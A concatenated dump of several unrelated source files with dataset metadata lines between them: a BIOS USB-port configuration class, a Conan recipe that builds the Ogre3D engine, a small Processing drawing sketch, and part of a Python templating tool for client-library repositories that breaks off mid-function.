"vp_usb_port_internal": MoPropertyMeta("vp_usb_port_internal", "vpUsbPortInternal", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x40, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_kvm": MoPropertyMeta("vp_usb_port_kvm", "vpUsbPortKVM", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x80, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_rear": MoPropertyMeta("vp_usb_port_rear", "vpUsbPortRear", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x100, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_sd_card": MoPropertyMeta("vp_usb_port_sd_card", "vpUsbPortSDCard", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x200, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_v_media": MoPropertyMeta("vp_usb_port_v_media", "vpUsbPortVMedia", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x400, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
},
"modular": {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x2, 0, 255, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x8, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"vp_all_usb_devices": MoPropertyMeta("vp_all_usb_devices", "vpAllUsbDevices", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_front": MoPropertyMeta("vp_usb_port_front", "vpUsbPortFront", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, 0x20, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_internal": MoPropertyMeta("vp_usb_port_internal", "vpUsbPortInternal", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x40, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_kvm": MoPropertyMeta("vp_usb_port_kvm", "vpUsbPortKVM", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x80, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_rear": MoPropertyMeta("vp_usb_port_rear", "vpUsbPortRear", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x100, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_sd_card": MoPropertyMeta("vp_usb_port_sd_card", "vpUsbPortSDCard", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, 0x200, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_v_media": MoPropertyMeta("vp_usb_port_v_media", "vpUsbPortVMedia", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x400, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
},
}
prop_map = {
"classic": {
"childAction": "child_action",
"dn": "dn",
"rn": "rn",
"status": "status",
"vpAllUsbDevices": "vp_all_usb_devices",
"vpUsbPortFront": "vp_usb_port_front",
"vpUsbPortInternal": "vp_usb_port_internal",
"vpUsbPortKVM": "vp_usb_port_kvm",
"vpUsbPortRear": "vp_usb_port_rear",
"vpUsbPortSDCard": "vp_usb_port_sd_card",
"vpUsbPortVMedia": "vp_usb_port_v_media",
},
"modular": {
"childAction": "child_action",
"dn": "dn",
"rn": "rn",
"status": "status",
"vpAllUsbDevices": "vp_all_usb_devices",
"vpUsbPortFront": "vp_usb_port_front",
"vpUsbPortInternal": "vp_usb_port_internal",
"vpUsbPortKVM": "vp_usb_port_kvm",
"vpUsbPortRear": "vp_usb_port_rear",
"vpUsbPortSDCard": "vp_usb_port_sd_card",
"vpUsbPortVMedia": "vp_usb_port_v_media",
},
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.status = None
self.vp_all_usb_devices = None
self.vp_usb_port_front = None
self.vp_usb_port_internal = None
self.vp_usb_port_kvm = None
self.vp_usb_port_rear = None
self.vp_usb_port_sd_card = None
self.vp_usb_port_v_media = None
ManagedObject.__init__(self, "BiosVfUSBPortsConfig", parent_mo_or_dn, **kwargs)
| 66.088235
| 256
| 0.683689
|
e2c824c53b1ca2ad2a753d8ea2eb35283b797c73
| 15,524
|
py
|
Python
|
conanfile.py
|
HerAmu/conan-ogre3d
|
80e4cc40d55f66579c312dbe5042f794d8e3426d
|
[
"MIT"
] | null | null | null |
conanfile.py
|
HerAmu/conan-ogre3d
|
80e4cc40d55f66579c312dbe5042f794d8e3426d
|
[
"MIT"
] | null | null | null |
conanfile.py
|
HerAmu/conan-ogre3d
|
80e4cc40d55f66579c312dbe5042f794d8e3426d
|
[
"MIT"
] | null | null | null |
from conans import ConanFile, CMake, tools
from conans.model.version import Version
class Ogre3dConan(ConanFile):
name = "ogre3d"
version = "1.12.9"
license = "MIT"
author = "SINTEF Ocean"
url = "https://github.com/sintef-ocean/conan-ogre3d"
description = "3D graphics rendering engine"
topics = ("graphics", "3D rendering", "3D", "ogre3d")
settings = "os", "compiler", "build_type", "arch"
options = {
"with_cg": [True, False],
"with_boost": [True, False],
"with_poco": [True, False],
"samples": [True, False],
"with_python": [True, False],
"with_csharp": [True, False],
"with_java": [True, False],
"with_qt": [True, False],
"bites": [True, False],
"direct3d9_renderer": [True, False],
"direct3d11_renderer": [True, False],
"opengl_renderer": [True, False],
"opengl3_renderer": [True, False],
"opengles_renderer": [True, False],
"codec_freeimage": [True, False],
"codec_stbi": [True, False],
"plugin_bsp_scenemanager": [True,False],
"plugin_octree": [True,False],
"plugin_particlefx": [True,False],
"plugin_dotscene": [True,False],
"plugin_pcz_scenemanager": [True,False],
}
default_options = {
"with_cg": False,
"with_boost": False,
"with_poco": False,
"samples": False,
"with_python": False,
"with_csharp": False,
"with_java": False,
"with_qt": False,
"bites": False,
"direct3d9_renderer": False,
"direct3d11_renderer": False,
"opengl_renderer": False,
"opengl3_renderer": False,
"opengles_renderer": False,
"codec_freeimage": True,
"codec_stbi": True,
"plugin_bsp_scenemanager": True,
"plugin_octree": True,
"plugin_particlefx": True,
"plugin_dotscene": True,
"plugin_pcz_scenemanager": True,
}
generators = "cmake"
requires = [
("bzip2/1.0.8"),
("libpng/1.6.37"),
("freetype/2.10.2"),
("zlib/1.2.11"),
("pugixml/1.10"),
("sdl2/2.0.10@bincrafters/stable"),
("zziplib/0.13.71"),
# ("ois/1.5@utopia/testing"), # for older versions
]
folder_name = "ogre-{}".format(version)
# scm is a workaround for https://github.com/OGRECave/ogre/issues/1332
scm = {
"type": "git",
"subfolder": folder_name,
"url": "https://github.com/OGRECave/ogre.git",
"revision": "v{}".format(version),
"submodule": "recursive"
}
def configure(self):
# we only need sdl for IO control
self.options["sdl2"].fPIC = False
self.options["sdl2"].iconv = False
self.options["sdl2"].sdl2main = False
if self.settings.os == "Linux":
self.options["sdl2"].alsa = False
self.options["sdl2"].jack = False
self.options["sdl2"].pulse = False
self.options["sdl2"].nas = False
self.options["sdl2"].xcursor = False
self.options["sdl2"].xinerama = False
self.options["sdl2"].xinput = False
self.options["sdl2"].xrandr = False
self.options["sdl2"].xscrnsaver = False
self.options["sdl2"].xshape = False
self.options["sdl2"].xvm = False
if self.settings.os != "Windows":
del self.options.direct3d9_renderer
del self.options.direct3d11_renderer
def requirements(self):
if self.options.with_boost:
self.requires("boost/1.71.0@conan/stable")
if self.options.with_poco:
self.requires("poco/1.9.4")
if self.options.with_qt:
if self.settings.compiler != 'Visual Studio':
self.options["sdl2"].fPIC = True
self.requires("qt/5.15.2")
self.requires("libjpeg/9d")
if self.options.bites and self.settings.compiler != 'Visual Studio':
self.options["sdl2"].fPIC = True
if self.options.with_cg:
self.requires("nvidia-cg-toolkit-binaries/3.1.0013@utopia/testing")
if self.settings.os == "Linux" and self.options.bites:
self.requires("libxaw/1.0.13@bincrafters/stable")
if self.options.codec_freeimage:
self.requires("libjpeg/9d")
self.requires("freeimage/3.18.0@utopia/testing")
#if self.options.opengles_renderer:
#self.requires("opengl/system")
#if self.settings.os == "Linux":
# self.requires("egl/system")
def source(self):
tools.replace_in_file("{}/CMakeLists.txt".format(self.folder_name),
"project(OGRE VERSION {})".format(self.version),
'''project(OGRE VERSION {})
include(${{CMAKE_BINARY_DIR}}/conanbuildinfo.cmake)
conan_basic_setup()
link_libraries(${{CONAN_LIBS}})
add_compile_definitions(GLEW_NO_GLU)
add_compile_definitions(QT_NO_VERSION_TAGGING)'''.format(self.version))
def configure_cmake(self):
cmake = CMake(self)
cmake.definitions["OGRE_BUILD_DEPENDENCIES"] = "NO" # use conan libs
cmake.definitions["OGRE_COPY_DEPENDENCIES"] = "OFF"
cmake.definitions["OGRE_INSTALL_DEPENDENCIES"] = "OFF"
cmake.definitions["OGRE_INSTALL_PDB"] = "ON"
cmake.definitions["OGRE_BUILD_PLUGIN_CG"] = \
"ON" if self.options.with_cg else "OFF"
cmake.definitions["OGRE_BUILD_SAMPLES"] = \
"ON" if self.options.samples else "OFF"
cmake.definitions["OGRE_BUILD_COMPONENT_PYTHON"] = \
"ON" if self.options.with_python else "OFF"
cmake.definitions["OGRE_BUILD_COMPONENT_CSHARP"] = \
"ON" if self.options.with_csharp else "OFF"
cmake.definitions["OGRE_BUILD_COMPONENT_JAVA"] = \
"ON" if self.options.with_java else "OFF"
cmake.definitions["OGRE_BUILD_COMPONENT_BITES"] = \
"ON" if self.options.bites else "OFF"
if self.settings.os == "Windows":
cmake.definitions["OGRE_BUILD_RENDERSYSTEM_D3D9"] = \
"ON" if self.options.direct3d9_renderer else "OFF"
cmake.definitions["OGRE_BUILD_RENDERSYSTEM_D3D11"] = \
"ON" if self.options.direct3d11_renderer else "OFF"
cmake.definitions["OGRE_BUILD_RENDERSYSTEM_GL3PLUS"] = \
"ON" if self.options.opengl3_renderer else "OFF"
cmake.definitions["OGRE_BUILD_RENDERSYSTEM_GL"] = \
"ON" if self.options.opengl_renderer else "OFF"
cmake.definitions["OGRE_BUILD_RENDERSYSTEM_GLES2"] = \
"ON" if self.options.opengles_renderer else "OFF"
if self.settings.compiler == "clang":
cmake.definitions["CMAKE_EXE_LINKER_FLAGS"] = "-fopenmp=libomp"
cmake.definitions["Build_FreeImage_codec."] = \
"ON" if self.options.codec_freeimage else "OFF"
cmake.definitions["Enable_STBI_image_codec."] = \
"ON" if self.options.codec_stbi else "OFF"
cmake.definitions["Build_BSP_SceneManager_plugin"] = \
"ON" if self.options.plugin_bsp_scenemanager else "OFF"
cmake.definitions["Build_Octree_SceneManager_plugin"] = \
"ON" if self.options.plugin_octree else "OFF"
cmake.definitions["Build_ParticleFX_plugin"] = \
"ON" if self.options.plugin_particlefx else "OFF"
cmake.definitions["Build_.scene_plugin"] = \
"ON" if self.options.plugin_dotscene else "OFF"
cmake.definitions["Build_PCZ_SceneManager_plugin"] = \
"ON" if self.options.plugin_pcz_scenemanager else "OFF"
cmake.configure(source_folder=self.folder_name)
return cmake
def build(self):
cmake = self.configure_cmake()
cmake.build()
def package(self):
cmake = self.configure_cmake()
cmake.install()
self.copy("LICENSE*", dst="licenses",
ignore_case=True, keep_path=True)
# If UNIX, lib-prefix need to be added to plugin libraries which are intentially removed by Ogres build system
if self.settings.os != "Windows":
if self.options.codec_freeimage:
tools.rename("{}/lib/OGRE/Codec_FreeImage.so".format(self.package_folder), \
"{}/lib/OGRE/libCodec_FreeImage.so".format(self.package_folder))
if self.options.codec_stbi:
tools.rename("{}/lib/OGRE/Codec_STBI.so".format(self.package_folder), \
"{}/lib/OGRE/libCodec_STBI.so".format(self.package_folder))
if self.options.plugin_bsp_scenemanager:
tools.rename("{}/lib/OGRE/Plugin_BSPSceneManager.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_BSPSceneManager.so".format(self.package_folder))
if self.options.plugin_octree:
tools.rename("{}/lib/OGRE/Plugin_OctreeSceneManager.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_OctreeSceneManager.so".format(self.package_folder))
if self.options.plugin_particlefx:
tools.rename("{}/lib/OGRE/Plugin_ParticleFX.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_ParticleFX.so".format(self.package_folder))
if self.options.plugin_dotscene:
tools.rename("{}/lib/OGRE/Plugin_DotScene.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_DotScene.so".format(self.package_folder))
if self.options.with_cg:
tools.rename("{}/lib/OGRE/Plugin_CgProgramManager.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_CgProgramManager.so".format(self.package_folder))
if self.options.plugin_pcz_scenemanager:
tools.rename("{}/lib/OGRE/Plugin_PCZSceneManager.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_PCZSceneManager.so".format(self.package_folder))
tools.rename("{}/lib/OGRE/Plugin_OctreeZone.so".format(self.package_folder), \
"{}/lib/OGRE/libPlugin_OctreeZone.so".format(self.package_folder))
if self.options.opengl_renderer:
tools.rename("{}/lib/OGRE/RenderSystem_GL.so".format(self.package_folder), \
"{}/lib/OGRE/libRenderSystem_GL.so".format(self.package_folder))
if self.options.opengl3_renderer:
tools.rename("{}/lib/OGRE/RenderSystem_GL3Plus.so".format(self.package_folder), \
"{}/lib/OGRE/libRenderSystem_GL3Plus.so".format(self.package_folder))
if self.options.opengles_renderer:
tools.rename("{}/lib/OGRE/RenderSystem_GLES2.so".format(self.package_folder), \
"{}/lib/OGRE/libRenderSystem_GLES2.so".format(self.package_folder))
def package_info(self):
self.cpp_info.name = 'Ogre3D'
self.cpp_info.libdirs = ['lib', 'lib/OGRE']
libs = [
"OgreMain",
"OgreOverlay",
"OgrePaging",
"OgreProperty",
"OgreRTShaderSystem",
"OgreTerrain",
"OgreVolume",
"OgreMeshLodGenerator",
]
if self.options.codec_freeimage:
libs.append("Codec_FreeImage")
if self.options.codec_stbi:
libs.append("Codec_STBI")
if self.options.plugin_bsp_scenemanager:
libs.append("Plugin_BSPSceneManager")
if self.options.plugin_octree:
libs.append("Plugin_OctreeSceneManager")
if self.options.plugin_particlefx:
libs.append("Plugin_ParticleFX")
if self.options.plugin_dotscene:
libs.append("Plugin_DotScene")
if self.options.with_cg:
libs.append("Plugin_CgProgramManager")
if self.options.plugin_pcz_scenemanager:
libs.append("Plugin_PCZSceneManager")
libs.append("Plugin_OctreeZone")
if self.options.opengl_renderer:
libs.append("RenderSystem_GL")
if self.options.opengl3_renderer:
libs.append("RenderSystem_GL3Plus")
if self.settings.os == "Windows":
if self.options.direct3d9_renderer:
libs.append("RenderSystem_Direct3D9")
if self.options.direct3d11_renderer:
libs.append("RenderSystem_Direct3D11")
if self.options.opengles_renderer:
libs.append("RenderSystem_GLES2")
if self.options.opengl_renderer or self.options.opengl3_renderer or self.options.opengles_renderer:
libs.append("OgreGLSupport")
if self.options.bites:
libs.append("OgreBites")
if self.options.with_qt:
libs.append("OgreBitesQt")
self.cpp_info.includedirs.extend([
"include/OGRE",
"include/OGRE/Overlay",
"include/OGRE/Paging",
"include/OGRE/Property",
"include/OGRE/RTShaderSystem",
"include/OGRE/Terrain",
"include/OGRE/Volume",
"include/OGRE/Threading",
"include/OGRE/MeshLodGenerator",
])
if self.options.bites:
self.cpp_info.includedirs.append("include/OGRE/Bites")
if self.options.codec_freeimage:
self.cpp_info.includedirs.append("include/OGRE/Plugins/FreeImageCodec")
if self.options.codec_stbi:
self.cpp_info.includedirs.append("include/OGRE/Plugins/STBICodec")
if self.options.opengl_renderer:
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/GL")
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/GL/GL")
if self.options.opengl3_renderer:
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/GL3Plus")
if self.settings.os == "Windows":
if self.options.direct3d9_renderer:
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/Direct3D9")
if self.options.direct3d11_renderer:
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/Direct3D11")
if self.options.opengles_renderer:
self.cpp_info.includedirs.append("include/OGRE/RenderSystems/GLES2")
if self.options.plugin_bsp_scenemanager:
self.cpp_info.includedirs.append("include/OGRE/Plugins/BSPSceneManager")
if self.options.plugin_octree:
self.cpp_info.includedirs.append("include/OGRE/Plugins/OctreeSceneManager")
if self.options.plugin_particlefx:
self.cpp_info.includedirs.append("include/OGRE/Plugins/ParticleFX")
if self.options.plugin_dotscene:
self.cpp_info.includedirs.append("include/OGRE/Plugins/DotScene")
if self.options.with_cg:
self.cpp_info.includedirs.append("include/OGRE/Plugins/CgProgramManager")
if self.options.plugin_pcz_scenemanager:
self.cpp_info.includedirs.append("include/OGRE/Plugins/PCZSceneManager")
self.cpp_info.includedirs.append("include/OGRE/Plugins/OctreeZone")
if self.settings.compiler == "clang":
self.cpp_info.exelinkflags = ["-fopenmp=libomp"]
if self.settings.compiler == "Visual Studio" \
and self.settings.build_type == "Debug":
self.cpp_info.libs = [lib + "_d" for lib in libs]
else:
self.cpp_info.libs = libs
| 42.76584
| 118
| 0.616014
|
fdaa17f290c5a640a9e84a511383781a4fdb7352
| 221
|
pyde
|
Python
|
Homework/Listings/li2/li2.pyde
|
GranDarKross/2019-fall-polytech-cs
|
01ea3dccf7da66a32b14ec0df28d97cefc1d2160
|
[
"MIT"
] | null | null | null |
Homework/Listings/li2/li2.pyde
|
GranDarKross/2019-fall-polytech-cs
|
01ea3dccf7da66a32b14ec0df28d97cefc1d2160
|
[
"MIT"
] | null | null | null |
Homework/Listings/li2/li2.pyde
|
GranDarKross/2019-fall-polytech-cs
|
01ea3dccf7da66a32b14ec0df28d97cefc1d2160
|
[
"MIT"
] | null | null | null |
def setup():
size(400,400)
smooth()
noLoop()
background(10)
strokeWeight(10)
stroke(150)
def draw():
fill(250)
rect(100,100,100,100)
fill(50)
rect(200,200,50,100)
| 15.785714
| 26
| 0.524887
|
5b0bcc25efcfe37c7ea916e2633f36f9dea4bbaa
| 16,284
|
py
|
Python
|
synthtool/gcp/common.py
|
dzou/synthtool
|
d730883a396d1b475df95ddd47fdb6ccc79a29db
|
[
"Apache-2.0"
] | null | null | null |
synthtool/gcp/common.py
|
dzou/synthtool
|
d730883a396d1b475df95ddd47fdb6ccc79a29db
|
[
"Apache-2.0"
] | null | null | null |
synthtool/gcp/common.py
|
dzou/synthtool
|
d730883a396d1b475df95ddd47fdb6ccc79a29db
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import re
import shutil
import fnmatch
from copy import deepcopy
from pathlib import Path
from typing import Dict, List, Optional
import jinja2
from synthtool import shell, _tracked_paths
from synthtool.gcp import partials
from synthtool.languages import node
from synthtool.log import logger
from synthtool.sources import git, templates
PathOrStr = templates.PathOrStr
TEMPLATES_URL: str = git.make_repo_clone_url("googleapis/synthtool")
DEFAULT_TEMPLATES_PATH = "synthtool/gcp/templates"
LOCAL_TEMPLATES: Optional[str] = os.environ.get("SYNTHTOOL_TEMPLATES")
class CommonTemplates:
def __init__(self, template_path: Optional[Path] = None):
if template_path:
self._template_root = template_path
elif LOCAL_TEMPLATES:
logger.debug(f"Using local templates at {LOCAL_TEMPLATES}")
self._template_root = Path(LOCAL_TEMPLATES)
else:
templates_git = git.clone(TEMPLATES_URL)
self._template_root = templates_git / DEFAULT_TEMPLATES_PATH
self._templates = templates.Templates(self._template_root)
self.excludes = [] # type: List[str]
def _generic_library(self, directory: str, **kwargs) -> Path:
# load common repo meta information (metadata that's not language specific).
if "metadata" in kwargs:
self._load_generic_metadata(kwargs["metadata"])
# if no samples were found, don't attempt to render a
# samples/README.md.
if "samples" not in kwargs["metadata"] or not kwargs["metadata"]["samples"]:
self.excludes.append("samples/README.md")
t = templates.TemplateGroup(self._template_root / directory, self.excludes)
if "repository" in kwargs["metadata"] and "repo" in kwargs["metadata"]:
kwargs["metadata"]["repo"]["default_branch"] = _get_default_branch_name(
kwargs["metadata"]["repository"]
)
# TODO: migrate to python.py once old sample gen is deprecated
if directory == "python_samples":
t.env.globals["get_help"] = lambda filename: shell.run(
["python", filename, "--help"]
).stdout
result = t.render(**kwargs)
_tracked_paths.add(result)
return result
def py_samples(self, **kwargs) -> List[Path]:
"""
Handles generation of README.md templates for Python samples
- Determines whether generation is being done in a client library or in a samples
folder automatically
- Otherwise accepts manually set sample_project_dir through kwargs metadata
- Delegates generation of additional sample documents alternate/overridden folders
through py_samples_override()
"""
# kwargs["metadata"] is required to load values from .repo-metadata.json
if "metadata" not in kwargs:
kwargs["metadata"] = {}
# load common repo meta information (metadata that's not language specific).
self._load_generic_metadata(kwargs["metadata"])
# temporary exclusion prior to old templates being migrated out
self.excludes.extend(
[
"README.rst",
"auth_api_key.tmpl.rst",
"auth.tmpl.rst",
"install_deps.tmpl.rst",
"install_portaudio.tmpl.rst",
"noxfile.py.j2",
]
)
# ensure samples will generate
kwargs["metadata"]["samples"] = True
# determine if in client lib and set custom root sample dir if specified, else None
in_client_library = Path("samples").exists()
sample_project_dir = kwargs["metadata"]["repo"].get("sample_project_dir")
if sample_project_dir is None: # Not found in metadata
if in_client_library:
sample_project_dir = "samples"
else:
sample_project_dir = "."
elif not Path(sample_project_dir).exists():
raise Exception(f"'{sample_project_dir}' does not exist")
override_paths_to_samples: Dict[
str, List[str]
] = {} # Dict of format { override_path : sample(s) }
samples_dict = deepcopy(kwargs["metadata"]["repo"].get("samples"))
default_samples_dict = [] # Dict which will generate in sample_project_dir
# Iterate through samples to store override_paths_to_samples for all existing
# override paths
for sample_idx, sample in enumerate(samples_dict):
override_path = samples_dict[sample_idx].get("override_path")
if override_path is not None:
# add absolute path to metadata so `python foo.py --help` succeeds
if sample.get("file") is not None:
path = os.path.join(
sample_project_dir, override_path, sample.get("file")
)
sample["abs_path"] = Path(path).resolve()
cur_override_sample = override_paths_to_samples.get(override_path)
# Base case: No samples are yet planned to gen in this override dir
if cur_override_sample is None:
override_paths_to_samples[override_path] = [sample]
# Else: Sample docs will be generated in README merged with other
# sample doc(s) already planned to generate in this dir
else:
cur_override_sample.append(sample)
override_paths_to_samples[override_path] = cur_override_sample
# If override path none, will be generated in the default
# folder: sample_project_dir
else:
if sample.get("file") is not None:
path = os.path.join(sample_project_dir, sample.get("file"))
sample["abs_path"] = Path(path).resolve()
default_samples_dict.append(sample)
# List of paths to tempdirs which will be copied into sample folders
result = []
# deep copy is req. here to avoid kwargs being affected
overridden_samples_kwargs = deepcopy(kwargs)
for override_path in override_paths_to_samples:
# Generate override sample docs
result.append(
self.py_samples_override(
root=sample_project_dir,
override_path=override_path,
override_samples=override_paths_to_samples[override_path],
**overridden_samples_kwargs,
)
)
kwargs["metadata"]["repo"]["samples"] = default_samples_dict
logger.debug(
f"Generating templates for samples directory '{sample_project_dir}'"
)
kwargs["subdir"] = sample_project_dir
# Generate default sample docs
result.append(self._generic_library("python_samples", **kwargs))
for path in result:
# .add() records the root of the paths and needs to be applied to each
_tracked_paths.add(path)
return result
def py_samples_override(
self, root, override_path, override_samples, **overridden_samples_kwargs
) -> Path:
"""
Handles additional generation of READMEs where "override_path"s
are set in one or more samples' metadata
"""
overridden_samples_kwargs["metadata"]["repo"][
"sample_project_dir"
] = override_path
# Set samples metadata to ONLY samples intended to generate
# under this directory (override_path)
overridden_samples_kwargs["metadata"]["repo"]["samples"] = override_samples
if root != ".":
override_path = Path(root) / override_path
logger.debug(f"Generating templates for override path '{override_path}'")
overridden_samples_kwargs["subdir"] = override_path
return self._generic_library("python_samples", **overridden_samples_kwargs)
def py_library(self, **kwargs) -> Path:
# kwargs["metadata"] is required to load values from .repo-metadata.json
if "metadata" not in kwargs:
kwargs["metadata"] = {}
# rename variable to accomodate existing synth.py files
if "system_test_dependencies" in kwargs:
kwargs["system_test_local_dependencies"] = kwargs[
"system_test_dependencies"
]
logger.warning(
"Template argument 'system_test_dependencies' is deprecated."
"Use 'system_test_local_dependencies' or 'system_test_external_dependencies'"
"instead."
)
# Set default Python versions for noxfile.py
if "default_python_version" not in kwargs:
kwargs["default_python_version"] = "3.8"
if "unit_test_python_versions" not in kwargs:
kwargs["unit_test_python_versions"] = ["3.6", "3.7", "3.8", "3.9", "3.10"]
if "system_test_python_versions" not in kwargs:
kwargs["system_test_python_versions"] = ["3.8"]
# If cov_level is not given, set it to None.
if "cov_level" not in kwargs:
kwargs["cov_level"] = None
# Don't add samples templates if there are no samples
if "samples" not in kwargs:
self.excludes += ["samples/AUTHORING_GUIDE.md", "samples/CONTRIBUTING.md"]
# Assume the python-docs-samples Dockerfile is used for samples by default
if "custom_samples_dockerfile" not in kwargs:
kwargs["custom_samples_dockerfile"] = False
ret = self._generic_library("python_library", **kwargs)
# If split_system_tests is set to True, we disable the system
# test in the main presubmit build and create individual build
# configs for each python versions.
if kwargs.get("split_system_tests", False):
template_root = self._template_root / "py_library_split_systests"
# copy the main presubmit config
shutil.copy2(
template_root / ".kokoro/presubmit/presubmit.cfg",
ret / ".kokoro/presubmit/presubmit.cfg",
)
env = jinja2.Environment(loader=jinja2.FileSystemLoader(str(template_root)))
tmpl = env.get_template(".kokoro/presubmit/system.cfg")
for v in kwargs["system_test_python_versions"]:
nox_session = f"system-{v}"
dest = ret / f".kokoro/presubmit/system-{v}.cfg"
content = tmpl.render(nox_session=nox_session)
with open(dest, "w") as f:
f.write(content)
return ret
def java_library(self, **kwargs) -> Path:
# kwargs["metadata"] is required to load values from .repo-metadata.json
if "metadata" not in kwargs:
kwargs["metadata"] = {}
return self._generic_library("java_library", **kwargs)
def node_library(self, **kwargs) -> Path:
# TODO: once we've migrated all Node.js repos to either having
# .repo-metadata.json, or excluding README.md, we can remove this.
if not os.path.exists("./.repo-metadata.json"):
self.excludes.append("README.md")
if "samples/README.md" not in self.excludes:
self.excludes.append("samples/README.md")
kwargs["metadata"] = node.template_metadata()
kwargs["publish_token"] = node.get_publish_token(kwargs["metadata"]["name"])
ignore_src_index = [
"yes" for f in self.excludes if fnmatch.fnmatch("src/index.ts", f)
]
# generate root-level `src/index.ts` to export multiple versions and its default clients
if (
"versions" in kwargs
and "default_version" in kwargs
and not ignore_src_index
):
node.generate_index_ts(
versions=kwargs["versions"], default_version=kwargs["default_version"]
)
return self._generic_library("node_library", **kwargs)
def php_library(self, **kwargs) -> Path:
return self._generic_library("php_library", **kwargs)
def ruby_library(self, **kwargs) -> Path:
# kwargs["metadata"] is required to load values from .repo-metadata.json
if "metadata" not in kwargs:
kwargs["metadata"] = {}
return self._generic_library("ruby_library", **kwargs)
def render(self, template_name: str, **kwargs) -> Path:
template = self._templates.render(template_name, **kwargs)
_tracked_paths.add(template)
return template
def _load_generic_metadata(self, metadata: Dict):
"""
loads additional meta information from .repo-metadata.json.
"""
metadata["partials"] = partials.load_partials()
# Loads repo metadata information from the default location if it
# hasn't already been set. Some callers may have already loaded repo
# metadata, so we don't need to do it again or overwrite it. Also, only
# set the "repo" key.
if "repo" not in metadata:
metadata["repo"] = _load_repo_metadata()
def decamelize(value: str):
""" parser to convert fooBar.js to Foo Bar. """
if not value:
return ""
str_decamelize = re.sub("^.", value[0].upper(), value) # apple -> Apple.
str_decamelize = re.sub(
"([A-Z]+)([A-Z])([a-z0-9])", r"\1 \2\3", str_decamelize
) # ACLBatman -> ACL Batman.
return re.sub("([a-z0-9])([A-Z])", r"\1 \2", str_decamelize) # FooBar -> Foo Bar.
def _load_repo_metadata(metadata_file: str = "./.repo-metadata.json") -> Dict:
"""Parse a metadata JSON file into a Dict.
Currently, the defined fields are:
* `name` - The service's API name
* `name_pretty` - The service's API title. This will be used for generating titles on READMEs
* `product_documentation` - The product documentation on cloud.google.com
* `client_documentation` - The client library reference documentation
* `issue_tracker` - The public issue tracker for the product
* `release_level` - The release level of the client library. One of: alpha, beta, ga, deprecated
* `language` - The repo language. One of dotnet, go, java, nodejs, php, python, ruby
* `repo` - The GitHub repo in the format {owner}/{repo}
* `distribution_name` - The language-idiomatic package/distribution name
* `api_id` - The API ID associated with the service. Fully qualified identifier use to
enable a service in the cloud platform (e.g. monitoring.googleapis.com)
* `requires_billing` - Whether or not the API requires billing to be configured on the
customer's acocunt
Args:
metadata_file (str, optional): Path to the metadata json file
Returns:
A dictionary of metadata. This may not necessarily include all the defined fields above.
"""
if os.path.exists(metadata_file):
with open(metadata_file) as f:
return json.load(f)
return {}
def _get_default_branch_name(repository_name: str) -> str:
"""Read the default branch name from the environment.
First checks environment variable DEFAULT_BRANCH_PATH. If found, it
reads the contents of the file at DEFAULT_BRANCH_PATH and returns it.
Then checks environment varabile DEFAULT_BRANCH, and returns it if found.
"""
default_branch_path = os.getenv("DEFAULT_BRANCH_PATH")
if default_branch_path:
return Path(default_branch_path).read_text().strip()
# This default should be switched to "main" once we've migrated
